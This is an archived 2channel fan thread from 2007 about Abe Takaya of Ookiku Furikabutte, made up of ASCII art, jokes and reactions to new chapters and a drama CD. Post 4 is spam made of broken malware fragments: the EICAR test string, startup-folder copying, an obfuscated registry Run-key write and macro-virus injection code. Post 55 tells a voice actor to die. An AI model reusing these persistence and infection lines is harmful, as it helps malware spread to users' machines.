5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【おお振り】 阿部隆也17タレ目 【アペるな危険】

1 :名無しかわいいよ名無し:2007/11/17(土) 23:56:39 ID:MkaWdP9I
おおきく振りかぶってのタレ目捕手阿部隆也のスレです。
阿部のことについて、色々語ったり叫んだりして下さい。
次スレは>>970が立ててください。無理なら980に頼んでください。
スレタイはシンプル、自由を交互にするのが基本です。

※スレタイには「阿部隆也」「おお振り」(スペース等はなし)を入れてください

前スレ
【おお振り】 阿部隆也 【16タレ目】
http://anime2.2ch.net/test/read.cgi/cchara/1192931836/

2 :名無しかわいいよ名無し:2007/11/17(土) 23:59:35 ID:MkaWdP9I
過去スレ

【打てよ!】 おお振り捕手の阿部隆也さん(15) 【オレのために!】
http://anime2.2ch.net/test/read.cgi/cchara/1191506328/

おお振り阿部隆也14スレ目
http://anime2.2ch.net/test/read.cgi/cchara/1190549855/

【気合】おお振り阿部隆也13スレ目【入れろ】
http://anime2.2ch.net/test/read.cgi/cchara/1189602926/

おお振り頑張れ阿部隆也12スレ目
http://anime2.2ch.net/test/read.cgi/cchara/1188313321/

おお振り阿部隆也 11捕球目
http://anime2.2ch.net/test/read.cgi/cchara/1187408716/

【フラグの】おお振り阿部隆也 10捕球目【立つ頃に 解】
http://anime2.2ch.net/test/read.cgi/cchara/1186065661/

【フラグ】 おお振り阿部隆也 9捕球目 【MAX】
http://anime2.2ch.net/test/read.cgi/cchara/1185370930/

【おお振り】阿部 隆也 8キャッチ【捕手】
http://anime2.2ch.net/test/read.cgi/cchara/1184078214/

【おお振り】阿部隆也7キュン目
http://anime2.2ch.net/test/read.cgi/cchara/1182947597/

おお振り阿部隆也6キュン目
http://anime2.2ch.net/test/read.cgi/cchara/1181994803/

【じわっ】おお振り阿部隆也【だもん!】5キュン目
http://anime2.2ch.net/test/read.cgi/cchara/1181139286/

【じわっ】おお振り阿部隆也【だもん!】4キュン目
http://anime2.2ch.net/test/read.cgi/cchara/1180267527/

【オレだって】おお振り阿部隆也【頑張ってんだもん!】3キュン目
http://anime2.2ch.net/test/read.cgi/cchara/1178716385/

【友達って】ガンガレ阿部隆也【なんだっけ】2キュン目
http://anime2.2ch.net/test/read.cgi/cchara/1172678114/

おお振りの阿部隆也きゅんは垂れ目キモかわ腹黒い
http://anime2.2ch.net/test/read.cgi/cchara/1124549105/

3 :名無しかわいいよ名無し:2007/11/18(日) 01:28:20 ID:7CZD1rtE
           |;:;:;:;:;:;:;:;:;:;:;:|;:;:;:;:;:;:;:;:;:;:;:;:;:;:;:;:;:;:.|;:;:;:;:;:;:;:;:;:;:};:ヤ
           |;:;:;:;:;:;:;:;:,,,,-ーt弋''ーt、−-t、- 、L,,_;:;:;:;:;:;:./;:;|
           | _,-イ´/ |  .ヤ \|,,>ニ-~ヘ:::::::::::` ヽく;:;:/
        大''゙´::./=≠=_、V\| 〆-''゙´   Nヤ::::::::::::::::::`≧_
         /´::::.〈     ゙`     _二,.,,_   'iハ:::::::::::::::::::::/
        .|/リ、.ヤ  ,,ニ、 〉.   '´   ゙`   ヤN '⌒ヤ ≧、  >>1乙!!
           f~,| .r'´   /        〃〃  、´こマ}>´ヽ、
           | |.|〃〃 〈             ノ  y ノ≧: : : ヽ
           ヽ`|     ヽ _ ,, - ―''''7   .〈,ノ' ,,イ ~`'''ー--'
            `'|    r''ニ´-ー',二ニフ    .,-t匕y'
             \   \_〆´ ,,/   ,,∠、|从'
               .\   `二´    / /フ.|
                 .\      ./   7 |
                  |\_,,,./ |   l .|
                 r'´`'''ー-―-|   .iー'`ヽ
  _,,,,,_    _,,,...-―'''゙`r';:;:;:;:;:;:_;;;;_f_  ヤ;:;:;:/
ー´ .ヽ、   ̄ ̄~\ヽ〆~ ̄ ̄ ̄~´       .ヽ ゙`yヘ、
     .ヽ      Y                 .X´  `ヽ、、
      `      `     ´            `   ´ ´ 




4 :名無しかわいいよ名無し:2007/11/18(日) 04:08:30 ID:c4Qq+dc3
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


5 :名無しかわいいよ名無し:2007/11/18(日) 15:22:51 ID:bAw4l4nC
>>1
乙!

前スレ1000
阻止!

6 :名無しかわいいよ名無し:2007/11/18(日) 15:37:44 ID:klpLQdcv
(仝言仝)b<やっぱ>>1乙がいいね

アペるなをチョイスしたセンスに賛辞みたいなものをおくりたいw

7 :名無しかわいいよ名無し:2007/11/18(日) 16:19:00 ID:qcaTmZvF
>>1
乙!

そしてまさかのアペるな採用w

8 :名無しかわいいよ名無し:2007/11/18(日) 16:25:40 ID:WJuN0yM3
>>1乙!
スレタイGJ!

>>6は文と顔文字が一致してないwww

9 :名無しかわいいよ名無し:2007/11/18(日) 18:36:24 ID:I/AToT8S

 \|/
 ―●―― / ̄\ ∧  ∧
 /|\ /〜〜〜\仝言仝)<>>1
 ⊂⌒⌒⌒⊃/人\\\ノ
 ⊂⌒⌒⌒⌒⌒⊃\\\\

10 :名無しかわいいよ名無し:2007/11/18(日) 18:53:58 ID:vNX1OLNy
>>9
ちょwwwww
なにコレwwwwwww

11 :名無しかわいいよ名無し:2007/11/18(日) 19:31:14 ID:OoxqAGec
>>9
こっちみんな

12 :名無しかわいいよ名無し:2007/11/18(日) 20:13:29 ID:mcs/X4f7
>>11
IDおしいな

13 :名無しかわいいよ名無し:2007/11/18(日) 20:17:21 ID:S3zYXkss
アゲw

14 :名無しかわいいよ名無し:2007/11/18(日) 21:19:30 ID:p1LKC2C8
気軽に書いた肉ネタが広がってて噴いたw
どんなにクールな顔しても阿部が肉つけたまま授業受けたり部活したり
電車か自転車のってたと思うだけで爆笑です
(*仝ω仝)…

15 :名無しかわいいよ名無し:2007/11/18(日) 22:00:28 ID:klpLQdcv
>>9
一富士二番捕手ときたら三なすびだな


(*仝ω仝)<うっす (@◇@;)<お、おはよ あべく……
  米
(*´∀b)<(しー…wwwww)

16 :名無しかわいいよ名無し:2007/11/18(日) 23:14:57 ID:h4M6wwXe
      、>::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::k=-,
      ゝ:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::ミ´
    -=´::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::ヾ、_
     廴::::::::::::::::::::::::::::::::::ッ:::::ン:::/;:::::::::::::::::::::::::::::::ヾ、
    `ミ:::::::::::::::::::::::::::;::ソレヘ!|::/ lハ! i!::::::::::::::::::::::::::k´_
     及:::::::::::::::::rレー=ニ、、_  肉  'ヘ!N|:ト、:::::::,::弋
    -ニ:::;'キン、/  =─trq‐~゙='" ,ィ=_'三‐'i::::::乂`
     毛l ヒ'i    、  ゙‐'_    i kン"冫 ;'リメ!
       l レ' !    `  ̄      、ー- ' i l"  なんか今日はやたら顔を見られてる
       ヾ、、コ          ..:/     lノ   気がすっけど・・・>>1乙!
        ーヘ              '
          | 、   -‐─−- 、   /
           | 、 、     一   ,
          ,._|  ヽヘ、      ,
         l:::::`::..‐..._` ‐ -- く_
        」::::::::::::::::::::::::`::::-.-┘:i
      ,..:::::::::::::::::::::::::::::::::::::::::::::::::::l

17 :名無しかわいいよ名無し:2007/11/18(日) 23:45:59 ID:p1LKC2C8
>>16
wwwwwwww
キメ顔なのがまたww

18 :名無しかわいいよ名無し:2007/11/18(日) 23:48:45 ID:klpLQdcv
ちょ、キン肉マン隆也が降臨してるwwwwwwwwww
某マダオ張りに隆也バスターとか使えそうなくらいのイケメン顔じゃないかww


19 :名無しかわいいよ名無し:2007/11/19(月) 00:29:03 ID:IRZ1RTkK
         r‐!7
    {`ー┐|/  r、_
    `\\_ノ/
        \<__
          \r┘ /⌒~⌒ヽ
            / /  \ \
          ○ / / 肉\ ○
            (_ノ 。◇。)仝ω仝) ヽ_) < タカヤバスター
             ∨∨    /
           、 r  ( ヽノ⌒ヽ __jし/
           ){   と_ノ  ̄し'  `ヽて__  _ _
          /ヘ、         ノく`   ̄l\
                            \\ l7
                            <\__ノ/  [/
                              \_r'′

20 :名無しかわいいよ名無し:2007/11/19(月) 00:47:26 ID:xqtyt813
もうやめてwwwww

21 :名無しかわいいよ名無し:2007/11/19(月) 00:53:00 ID:WZIVYgOo
やべぇ職人達が輝いてるwwwwwGJ過ぎて言葉にできないwww
今日あたり夢に出て来そうだw

22 :名無しかわいいよ名無し:2007/11/19(月) 00:56:42 ID:WZIVYgOo
連投だが自重出来ないwwあえて突っ込ませてくれタカヤバスター>>19

この子よく見たら三w橋wじwゃwなwいwかwwwww




23 :名無しかわいいよ名無し:2007/11/19(月) 01:17:44 ID:PgWy1AUn
タカヤバスターがよくわからんのだが>>19の三橋が可哀想な事になっているんだが
可哀想というか痛そうというか

24 :名無しかわいいよ名無し:2007/11/19(月) 01:23:22 ID:xqtyt813
キン肉マンを知らない世代なのかな
世代じゃなくても額に肉ネタはうすた読んでればわかったりするのかな。

25 :名無しかわいいよ名無し:2007/11/19(月) 05:50:00 ID:PgWy1AUn
キン肉世代だけど技の名称までは覚えてなかった。言われてなんとなく思い出したよ。d

26 :名無しかわいいよ名無し:2007/11/19(月) 13:42:18 ID:kmD6NkOx
連載当時からの年だと来年は成人式なんだなー阿部達
みんな集まるんだね。和む

27 :名無しかわいいよ名無し:2007/11/19(月) 14:14:11 ID:BQ6HCU6+
全員同じ市内なのか?

28 :名無しかわいいよ名無し:2007/11/19(月) 19:34:52 ID:LqulzyVq
久々にこのスレ来たが、相変わらず飛ばしてるなオマイラw

29 :名無しかわいいよ名無し:2007/11/19(月) 21:13:38 ID:HtPAtpoo
>>26
隆也のスーツ姿・・・ドキドキ

30 :名無しかわいいよ名無し:2007/11/19(月) 21:24:15 ID:1f6Z8T3K
スーツじゃなくて羽織袴かもしれないぞww

31 :名無しかわいいよ名無し:2007/11/19(月) 21:40:37 ID:HeQjbjwE
成人式で暴れるDQNって羽織袴着てるヤツが多いよな

32 :名無しかわいいよ名無し:2007/11/19(月) 21:47:50 ID:h6OF9jgB
>>31 DQNに限って変な色の袴だったりな

阿部は無難にスーツで参加しそう
でも何となく大人にならないでほしいよ阿部ww

33 :名無しかわいいよ名無し:2007/11/19(月) 22:30:27 ID:eW9Rm/9E
和服も似合いそうだよね

スーツ!
(*´Д`*) ネクタイを片手で ぐいっ ってゆるめる仕草がたまらなく好きだー

34 :名無しかわいいよ名無し:2007/11/19(月) 23:16:18 ID:AyjAFu6A
阿部んちのお母さん、せっかく男の子だからって張り切って羽織袴そろえてきそう
弟のときはタカヤで失敗したからって無難にスーツ

35 :名無しかわいいよ名無し:2007/11/19(月) 23:38:04 ID:J+WFszxf
ヤバイ、この流れで七五三で羽織袴を着た
ちび阿部(5歳)を妄想した
…ちょっと鼻血止めてきます

36 :名無しかわいいよ名無し:2007/11/19(月) 23:44:04 ID:PgWy1AUn
自分は逆のイメージだ。
シュンちゃんの時の方が力入っちゃって奮発して羽織袴。
タカは…まあ適当じゃないけど皆と同じでいいよね?とか言ってスーツ。

37 :名無しかわいいよ名無し:2007/11/20(火) 06:21:23 ID:KG1fGbGd
>>15
ああ、以前何かの為に作っておいた阿部AA置いておきますね

        ┌┐
       んvヘゝ
       i   i
       ノ (仝ω仝) <ごめんナスって
      / (ノ   |)
      |     !
        ゙:、..,_,.ノ
        U U

AA阿部の顔は横長なのが困る
遅くなったが>>1
成人式阿部はスーツがいいな。羽織袴は三橋が着て(親に着せられて)そう

38 :名無しかわいいよ名無し:2007/11/20(火) 06:52:16 ID:DdTvikV/
>>637
阿部におはよう言いにきたのに吹いちまったじゃないかwww何かって何だw

とりあえず、阿部おはよう

39 :名無しかわいいよ名無し:2007/11/20(火) 07:31:48 ID:9n6hwZb/
637に期待

40 :名無しかわいいよ名無し:2007/11/20(火) 08:09:42 ID:MV5lM3CT
>>637になんて地雷をwwww

ひぐちは3年間描きたいと言ってるからそのうち18の阿部とかも本編で出て来たりするんだよな。
西浦は私服校だから成人式とまでいかなくともいつか卒業式でスーツ阿部も拝めるかも知れない。
でもやっぱり15歳阿部が好きなんだぜなんかさみしいんだぜ

41 :名無しかわいいよ名無し:2007/11/20(火) 11:43:43 ID:ALN1CxwF
まだ高校生だからスーツじゃなくて学ランかもな。
水谷辺りは洒落たスーツとかで来そうだが。

42 :名無しかわいいよ名無し:2007/11/20(火) 12:26:44 ID:7puM3H8H
3年っつっても、夏大までだろうけど。
時間すっ飛ばして卒業式ちょっとぐらいはあるかもな。
まあガクランだろうけど。

43 :名無しかわいいよ名無し:2007/11/20(火) 12:50:52 ID:QOADN7Gg
( 仝ω仝)<高校最後の思い出に防具付けて出るよ!

44 :名無しかわいいよ名無し:2007/11/20(火) 13:35:39 ID:cmVbOyZP
>>37
かわいいじゃないか…!
開いたと途端ナスが目に入って癒されたよ

45 :名無しかわいいよ名無し:2007/11/20(火) 14:06:06 ID:h7qBViT0
>>43
(*`▽´)ノ<オレもオレも!

46 :名無しかわいいよ名無し:2007/11/20(火) 14:07:14 ID:cmVbOyZP
>>43
>>45
やめなさいwww

47 :名無しかわいいよ名無し:2007/11/20(火) 15:54:09 ID:eucKVgQP
阿部がガクラン着てるとこって原作で出てきてないよね?
見てみたいーーー

48 :名無しかわいいよ名無し:2007/11/20(火) 17:57:34 ID:7o+9qwTo
他スレから〜〜。
真ん中ちょい下の阿部に注目!!
ttp://toku.xdisc.net/cgi/up/vcc/nm13158.jpg

49 :名無しかわいいよ名無し:2007/11/20(火) 18:10:56 ID:4lwJCNUA
あえて言うなら前スレで既出

50 :名無しかわいいよ名無し:2007/11/20(火) 19:01:43 ID:rgw/xcC9
卒業まで描けたら本望だと言ってたから
卒業式を期待している

51 :名無しかわいいよ名無し:2007/11/20(火) 20:26:14 ID:xON19aBA
阿部は泣くよ、ゲンミツに!

52 :名無しかわいいよ名無し:2007/11/20(火) 21:06:12 ID:MV5lM3CT
>>51
ID今度はアバさんですかwwwwwww

53 :名無しかわいいよ名無し:2007/11/20(火) 21:10:33 ID:vKnXuByX
アバさんこんばんは

54 :名無しかわいいよ名無し:2007/11/20(火) 21:30:04 ID:c6bEFAcz
http://www.nicovideo.jp/watch/sm370025
阿部さんおめでとう!

55 :名無しかわいいよ名無し:2007/11/20(火) 21:50:55 ID:U3+Ry5IC
盗作声優櫻井孝宏死ね

56 :名無しかわいいよ名無し:2007/11/21(水) 15:58:00 ID:/JohzCwp
過疎ってるなぁ
バレ防止でみんな避難中なのか

57 :名無しかわいいよ名無し:2007/11/22(木) 02:27:57 ID:Dp2brt2R
いつもなら阿部スレは1番賑わってるのに昨日1人だけって・・・
どんだけネタバレを恐れているんだw

58 :名無しかわいいよ名無し:2007/11/22(木) 03:07:08 ID:zn/gyD7L
本スレやしたらばにバレ来てたね








なんか阿部の出番ないらしいんですが〜…

59 :名無しかわいいよ名無し:2007/11/22(木) 03:43:36 ID:DqlLw9G8
仝ω仝

60 :名無しかわいいよ名無し:2007/11/22(木) 06:56:47 ID:yyJeX8SW
起きるの早いねー

阿部おはよう!

61 :名無しかわいいよ名無し:2007/11/22(木) 19:37:17 ID:egZnc9cp
アフタ明日には読めるのかな?阿部ー

62 :名無しかわいいよ名無し:2007/11/22(木) 20:10:13 ID:S20hgDjV
ご愁傷様です

63 :名無しかわいいよ名無し:2007/11/22(木) 22:05:07 ID:j0RTs0dW
(仝ω仝)<俺のストライクゾーンは広いぜ

64 :名無しかわいいよ名無し:2007/11/22(木) 22:36:22 ID:mN6FXCZc
アフタヌーン1月号にゲームの広告が載ってて、
初めて見る絵もあったんだけど、それもネタバレになるのかな



65 :名無しかわいいよ名無し:2007/11/23(金) 00:12:01 ID:ql5XtWbY
アフタ1月号読みました…読みました… 阿部〜(泣)

66 :名無しかわいいよ名無し:2007/11/23(金) 00:16:07 ID:XLAlN3Sf
一応はっておくか

*最新号のネタバレは発売日の0:00以降にお願いします。


67 :名無しかわいいよ名無し:2007/11/23(金) 02:10:55 ID:CS0sSa2B
先月はそんな無かったしアニメ終わって新参が出来る時期でもないのに
何故今回はこんなルール無視多いんだ?
改行とか意味ないのにバカだなあ。

今随分朝晩暗くなるの早くなったけど今は何時起き何時上がりなのかなー

68 :名無しかわいいよ名無し:2007/11/23(金) 23:29:08 ID:ckaeCOgo
もうすぐ解禁?
まだアフタ買えないから避難するか。

69 :名無しかわいいよ名無し:2007/11/24(土) 00:14:21 ID:/H7djo9Q
解禁した
阿部がいない回はアフタ読み始めて、初めてだったせいか
物足りなさを感じてしまった

70 :名無しかわいいよ名無し:2007/11/24(土) 00:32:10 ID:kTnHugX/
今月は来月、阿部だらけになるための、
嵐の前の静けさだと思うことにした。
来月はまた、血管切れそうな阿部が見られると思っている。

71 :名無しかわいいよ名無し:2007/11/24(土) 07:23:26 ID:l3KemeI0
おはよー阿部ー
阿部は二度寝なんてしないんだろーなー

72 :名無しかわいいよ名無し:2007/11/24(土) 09:02:17 ID:Dyr7xkUi
今月会えなかった分、次に会えた時の感動は大きいはずだ……

73 :名無しかわいいよ名無し:2007/11/24(土) 12:16:33 ID:8a+ei2kM
美丞戦終わるまで阿部は空気かな
ゲームと9巻を糧に次の登場を待つよ

74 :名無しかわいいよ名無し:2007/11/24(土) 18:34:25 ID:sgRmoH4h
(仝ω仝)<ゲームの前にDVDとCDがあるだろ


(个ω个)<(…俺はいつ出れるのかな…)

75 :名無しかわいいよ名無し:2007/11/24(土) 19:05:14 ID:zhLWQm5i
美丞戦に勝ったとしても、阿部はプレー出来ないから次の試合には
ベンチ入りすら無理なんだろうか?
スタンドで応援するにしても階段の上り下りとか大変だろうし、最悪
家でTV観戦!? そうなると、激減する阿部の出番
阿部ファンのことを考えてやはりここで負けるのだろうか?
ひぐちはそんなの関係ねぇ!とばかり勝ち進んじゃうのか?
阿部の出番を考えて試合結果を予想する自分がいる。ごめん

76 :名無しかわいいよ名無し:2007/11/24(土) 19:46:34 ID:sgRmoH4h
西浦メンバー、特に三橋と阿部と田島と沖の気持ちを考えたら美丞戦は勝って欲しい。

三橋は勝って阿部に言いたいし、阿部は負けたら「自分が怪我しなきゃ」と責めるだろうし、田島はキャッチャーとしての未熟さを痛感するだろうし、沖は「自分が変な所に投げなきゃ…」と責めるだろう。

次の試合はベンチ応援になるんじゃないかな?試合に出られない分、徹底的に相手を調べまくるだろうからまだまだ未熟の三橋と田島のバッテリーにアドバイス出来るし、他のナインも阿部に居て欲しいだろう。

77 :名無しかわいいよ名無し:2007/11/24(土) 19:46:51 ID:Mk0+pRVI
経験者の頭はあったほうがいいし、阿部を入れたからってあぶれる選手がいるわけでも
ないんだし、普通にベンチ入りはすると思ってたが

78 :名無しかわいいよ名無し:2007/11/24(土) 20:19:40 ID:KgBlyI8Y
3週間で治るって言われてたし
あんまり動かしたらいけないのは最初の内だけだろう

1塁か3塁のコーチャー阿部が見られないか期待してる

79 :名無しかわいいよ名無し:2007/11/24(土) 21:32:47 ID:uqNfpWEu
>>78
腫れが引くまで立つのは無理。
次の試合まで中一日だから、下手すりゃまだRICE中。
(48時間アイシングしてろって説もあるので)
ベンチには入ると思うけど。

まあ勝ったら、の話だけどね。

80 :名無しかわいいよ名無し:2007/11/24(土) 22:48:53 ID:t7Iyo1yq
確かに本編には出番なかったが、DS広告は充分な燃料補給になった。
阿部の書いた部誌、案外あっさりしてたな。

81 :名無しかわいいよ名無し:2007/11/24(土) 23:03:01 ID:mmSJjct1
>>76
私も勝って欲しいと思うけどそれを糧にこれから色々反省して頑張るってことなのかも
まだ1年生だしね

しかし阿部不足だ・・・・

82 :名無しかわいいよ名無し:2007/11/24(土) 23:37:23 ID:ZVlHTyjI
みんな!心の目で見るんだ!
ほらアフタのページの隙間に
ベンチで田島に配給説明しながら
三橋の打席にハラハラしてる阿部が見えて来ないか?

83 :名無しかわいいよ名無し:2007/11/24(土) 23:48:17 ID:8a+ei2kM
>>82 はポジティブ身につけてるな

84 :名無しかわいいよ名無し:2007/11/25(日) 02:21:50 ID:KN4dgbv/
>>75です

自分もポジティブ身につけます
もちろん試合には勝って欲しいのに阿部の出番ばっかり考えて・・・
オレの心は汚れている!><
コーチャーすら出来ないのにベンチ入り出来るんだろうか?なんて
疑問に思っちゃったもので
ブレーン的役割ができるなら普通にベンチ入りもありだよね! ホッ

85 :名無しかわいいよ名無し:2007/11/25(日) 08:13:57 ID:3REFy8OD
おはよう阿部!
いってきます!!!!

86 :名無しかわいいよ名無し:2007/11/25(日) 12:28:38 ID:JMjJGES2
この試合負けたら
ヒグチさんはバッテリーを対に書くの好きみたいだから
試合後はお見舞いと阿部がなぜ西浦にきたか?
があかされるんじゃないかな?
でも勝っても一年の夏が
長く続くから、たとえベンチでもおいしい。

87 :名無しかわいいよ名無し:2007/11/25(日) 18:32:12 ID:kAepi5C2
>>82-83
だっはっはっはっはっ

88 :名無しかわいいよ名無し:2007/11/25(日) 21:16:20 ID:DF+jRxE4
勝っても怪我したまま次の試合となると空気すぎるから
寂しいな

89 :名無しかわいいよ名無し:2007/11/25(日) 23:04:47 ID:3REFy8OD
今更なんだけど阿部がなんで捻挫したかとかどういう場面でどうやって捻挫したかっていうのを教えてくれませんか・・・・・・?
アフタも原作も未読ですごく気になってます。

90 :名無しかわいいよ名無し:2007/11/25(日) 23:11:47 ID:igNyN1M/
まずは原作買ってこい

話はそれからだ

91 :名無しかわいいよ名無し:2007/11/25(日) 23:13:13 ID:5Jf4zylp
試合当日球場に向う途中でコケたんだよ

92 :名無しかわいいよ名無し:2007/11/25(日) 23:16:14 ID:eoQk5FEj
落ちてたバナナの皮踏んだんだよ

93 :名無しかわいいよ名無し:2007/11/25(日) 23:21:46 ID:qTMcJEFq
車道に飛び出した子犬をかばって。

94 :名無しかわいいよ名無し:2007/11/25(日) 23:51:40 ID:BSMeTXzn
線路上に迷い込んだ子犬を助けるために新幹線を止めた時に


95 :名無しかわいいよ名無し:2007/11/26(月) 00:01:12 ID:88IKu88o
道に飛び出した他の国の選手の妹をかばって

96 :名無しかわいいよ名無し:2007/11/26(月) 00:27:34 ID:sWKtN4JU
屋根から落ちそうになった三橋を窓から手を出し引きずりあげ、
ホッと一息座った窓の手すりが腐っていたためにまっ逆さまに…

97 :名無しかわいいよ名無し:2007/11/26(月) 00:29:49 ID:R1jrrtK7
落とし穴に落ちたんだよ
ロカさんの掘った穴に

98 :名無しかわいいよ名無し:2007/11/26(月) 01:31:02 ID:O4E5M/aK
階段ですれ違った女子高生のスカート覗こうとして足滑らせたんだよ




なんか、途端に湧いたなw

99 :名無しかわいいよ名無し:2007/11/26(月) 02:10:17 ID:Tn50itDK
真実がひとつもない件www

100 :名無しかわいいよ名無し:2007/11/26(月) 02:49:07 ID:ezKWV8zT
(仝ω仝)<100

101 :名無しかわいいよ名無し:2007/11/26(月) 03:49:11 ID:TmP3K0ix
>>99
んなこたねーよ!!

102 :名無しかわいいよ名無し:2007/11/26(月) 11:49:12 ID:d+hN5lqQ
ここの人って性格悪いんすね…

103 :名無しかわいいよ名無し:2007/11/26(月) 12:01:22 ID:dWkkowCm
アベはひどいヤツだよ

104 :名無しかわいいよ名無し:2007/11/26(月) 12:02:41 ID:23aaTnyp
× 性格悪い
○ いい性格

105 :名無しかわいいよ名無し:2007/11/26(月) 12:27:01 ID:DJmqyguW
捕手向きな性格も追加で

106 :名無しかわいいよ名無し:2007/11/26(月) 12:34:14 ID:HSZFsPAi
今月の阿部は画面外で何してたのか考えようぜ
・田島と再復習

107 :名無しかわいいよ名無し:2007/11/26(月) 13:10:04 ID:i7CkGImX
今月みんな頑張って攻撃していたのに、それに対する阿部の反応が見られなくて
残念だったな……。
来月は西浦が守備の回だからさすがに出てくるだろうけど。

108 :名無しかわいいよ名無し:2007/11/26(月) 13:27:16 ID:kiP6AICW
>>102
空気読めずにマジレスすれば
アフタはしょうがないけど原作未読と豪語した上に
ちょっとググればいろんなブログに載ってることを聞かれてもなぁ
2ちゃんにむいてないんじゃない?

109 :名無しかわいいよ名無し:2007/11/26(月) 14:20:42 ID:qxFWDRuR
今月の阿部
・相手側のベンチを観察

で、サインがばれてることに阿部が最初に気がつくんだ、きっと。
来月阿部大活躍のフラグ立ったな。

110 :名無しかわいいよ名無し:2007/11/26(月) 21:09:46 ID:M+ivBGeJ
>>109
ベンチの奥からじゃフィールド見えないんじゃ。
しかも阿部は今は横向きが基本だ。

111 :名無しかわいいよ名無し:2007/11/27(火) 00:03:26 ID:SZ+R8nmW
じゃあここで阿部視力5.0説

112 :名無しかわいいよ名無し:2007/11/27(火) 00:26:18 ID:is34KAlU
野性児阿部wwwww
惚れるぜ

113 :名無しかわいいよ名無し:2007/11/27(火) 08:06:22 ID:hh4jk9+I
マサイ族阿部バロスw

114 :名無しかわいいよ名無し:2007/11/27(火) 16:12:03 ID:j5skCtSw
田島は素で3.0くらいありそうだけど

115 :名無しかわいいよ名無し:2007/11/27(火) 18:51:35 ID:ps+P9UaU
三橋が打ったときに阿部カットインくらいあってもいいかなと思ったけど
なかったってことは必要ないってことなんだよな、うん。そっかそっかー

116 :名無しかわいいよ名無し:2007/11/27(火) 23:32:40 ID:9miJfLwB
阿部は不要なヤツだよ

そんなことないよ

117 :名無しかわいいよ名無し:2007/11/28(水) 06:52:59 ID:waa/lE0n
今月号があまりに登場少ないので先月号を読み返した


…久しぶりに見た感じがした…

118 :名無しかわいいよ名無し:2007/11/28(水) 08:55:21 ID:DLLhYBCd
9巻にはたくさん出てくるよ^^

119 :名無しかわいいよ名無し:2007/11/28(水) 10:44:37 ID:zMaRFA8w
9巻はきっといろんな阿部に会えるよ

120 :名無しかわいいよ名無し:2007/11/28(水) 11:59:13 ID:waa/lE0n
9巻の内容、国立国会図書館で読んだ。
コピーは出来なかったのでなんとなくしか覚えてない。
早く読みたいよ〜。

121 :名無しかわいいよ名無し:2007/11/28(水) 17:16:50 ID:waa/lE0n
DVD6巻とCDゲット!


CD面白かった〜!


122 :名無しかわいいよ名無し:2007/11/28(水) 17:48:52 ID:AMcAA5ae
今日とある回転寿司屋に行ったら壁に
「全皿全ネタ120円」って書かれてたんだ
怒ってる阿部にしか見えなくて困ったw

123 :名無しかわいいよ名無し:2007/11/28(水) 18:21:00 ID:IgRGHcGH
全皿全<二週間で治す!!

124 :名無しかわいいよ名無し:2007/11/28(水) 18:46:21 ID:r/8op251
>>121
CDって何分くらいあるの?
買おうか迷ってる

125 :名無しかわいいよ名無し:2007/11/28(水) 19:59:22 ID:waa/lE0n
>>121
47分くらい。

126 :名無しかわいいよ名無し:2007/11/28(水) 20:02:40 ID:waa/lE0n
↑は>>124さんへ

何自分にレスしてんだ…orz

127 :名無しかわいいよ名無し:2007/11/28(水) 20:55:18 ID:n87vp9PQ
特典CDおもしろかったよー
第二弾も楽しみ

128 :名無しかわいいよ名無し:2007/11/28(水) 22:34:17 ID:1cWzBSRg
>>122
ウケるw

129 :名無しかわいいよ名無し:2007/11/29(木) 01:16:53 ID:ApeLwDjb
>>125-126
ありがとー  
ドンマイw


130 :名無しかわいいよ名無し:2007/11/29(木) 06:08:28 ID:A2ImZbZ7
CD47分もあったんだ
短く感じたよー中の声の人おもしろいよ
阿部の話もいっぱいしてくれたし、アニメ阿部も好きなら聴いたらおもしろいよ

131 :名無しかわいいよ名無し:2007/11/29(木) 09:04:30 ID:RFFqPLtK
「シグマセブンから来ました中村悠一です」はホントうけたwww
前にもラジオにゲストで出た時か何かに言ってたよな

132 :名無しかわいいよ名無し:2007/11/29(木) 12:18:16 ID:Gjndwso7
「事務所のカンバン背負って闘ってるんだ!」だっけ?
ひぐちの話とか怖がられてる?話とか、楽しい裏話がいっぱいだったね
三橋の中の人も楽しそうにしゃべってたし
高瀬の中の人の役の感想とかも興味深かったし
思ってた以上に面白かった


133 :名無しかわいいよ名無し:2007/11/29(木) 12:48:26 ID:RFFqPLtK
>>132
そうそうwwwひぐちの話も
「これ先生も聴くだろうからちょっと持ち上げとこうか?・・・先生美人だよねお綺麗だし等々・・・・これ位で十分か」
これも前にラジオで言ってたネタだったな 代永の「モデルさんかと思った」には流石にねえだろと思ったw
自分で持ち上げて、自分で落とすw

134 :名無しかわいいよ名無し:2007/11/29(木) 12:58:51 ID:40SRK8o3
ここは阿部のスレであって中村のスレじゃないんですけど…

135 :名無しかわいいよ名無し:2007/11/29(木) 13:01:58 ID:QscZ9dQ7
中村厨といわれるゆえんですね

136 :名無しかわいいよ名無し:2007/11/29(木) 15:00:50 ID:qBi/vude
おお振りCDの感想なんだからいいと思うけどな
131あたりはどーかと思うが

137 :名無しかわいいよ名無し:2007/11/29(木) 15:22:05 ID:I8tG24fZ
寧ろ131のうけどころがわからん
それって「西浦高校野球部から来ました阿部隆也です」って
言ってるのと同じじゃね?
